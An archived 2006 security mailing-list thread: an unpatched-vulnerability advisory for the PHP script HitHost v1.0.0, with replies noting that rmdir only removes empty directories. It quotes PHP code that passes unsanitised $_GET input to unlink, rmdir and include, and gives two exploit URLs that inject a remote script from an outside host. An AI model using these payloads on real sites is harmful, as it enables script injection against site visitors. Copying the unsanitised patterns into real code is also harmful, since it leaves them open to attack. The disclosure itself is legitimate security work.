Re: histhost v1.0.0 xss and possible rmdir

2006-03-15 Thread Chris Kuethe 
and my manpages for rmdir(1) [the utility] and rmdir(2) [the system
call] both say that the directory must be empty (ie, have no entries
other than "." or "..").

rmdir(2) should fail and errno should be set to ENOTEMPTY if the
directory is not empty.

On 3/14/06, Steven M. Christey <[EMAIL PROTECTED]> wrote:
>
> retard said:
>
> >as you see line 19 raises suspision of the possibility of rming 0777
> >dirs i've tried it on on my personal server with no sucess, if someone
> >knows of a way let me know.
>
> According to the PHP manual, rmdir only works on empty directories.
> Did you try to remove an empty directory?
>
> - Steve
>


--
GDB has a 'break' feature; why doesn't it have 'fix' too?

Re: histhost v1.0.0 xss and possible rmdir

2006-03-14 Thread Steven M. Christey 

retard said:

>as you see line 19 raises suspision of the possibility of rming 0777
>dirs i've tried it on on my personal server with no sucess, if someone
>knows of a way let me know.

According to the PHP manual, rmdir only works on empty directories.
Did you try to remove an empty directory?

- Steve

histhost v1.0.0 xss and possible rmdir

2006-03-07 Thread retard 
——– summary
software: HitHost
vendors website: http://daverave.64digits.com/index.php?page=hithost
versions: <= 1.0.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: medium

——– description
hithost uses $_GET variables in crucial parts of their code causing
xss vulnerabilities and _possibly_ allowing users to rm dirs chmoded
to 0777

in ./admin/deleteuser.php:
15  else
16  {
17  unlink("users/$deleteuser/password.php");
18  unlink("users/$deleteuser/counter.php");
19  rmdir("users/$deleteuser/");
20  echo "The user $deleteuser has been deleted";
21  }

as you see line 19 raises suspision of the possibility of rming 0777 
dirs
i've tried it on on my personal server with no sucess, if someone knows
of a way let me know.

in ./admin/viewuser.php:
6   $viewuser = $_GET['user'];
7   include("users/$viewuser/counter.php");
8   echo "Username: $viewuser";
9   echo "Number of counter hits: $hits";

this code is self explanitory, the script does not sanitise the 
$_GET['user']
allowing users to easily shove xss into the variable.

——– exploit(s)

http://example.com/admin/deleteuser.php?user=http://notlegal.ws/xss.js>

http://example.com/admin/viewuser.php?hits=http://notlegal.ws/xss.js>

——– credit
author(s): retard
email: [EMAIL PROTECTED]